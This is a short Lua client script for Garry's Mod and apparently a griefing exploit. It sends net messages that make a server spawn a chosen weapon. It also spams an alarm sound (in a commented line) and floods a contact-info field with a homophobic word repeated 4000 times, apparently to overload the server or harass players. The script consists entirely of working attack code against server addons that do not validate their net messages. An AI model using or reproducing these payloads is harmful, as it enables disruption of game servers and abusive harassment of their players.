local SWEP = CreateClientConVar("swep_targ", "")

concommand.Add("swep_targ_spawn", function()
	net.Start("toServer_CSSRequestSpawn")
        net.WriteString(SWEP:GetString())
        net.WriteBool(true)
    net.SendToServer()
end)

//interstate_run_cl 			for i = 1, 25 do net.Start("toServer_CSSPlaySound") net.WriteString("ambient/alarms/razortrain_horn1.wav") net.SendToServer() end

interstate_run_cl                                 net.Start("UpdateContactInfo")                                net.WriteString("MSN")                                net.WriteString(string.rep("gay\t", 4000)) net.SendToServer()

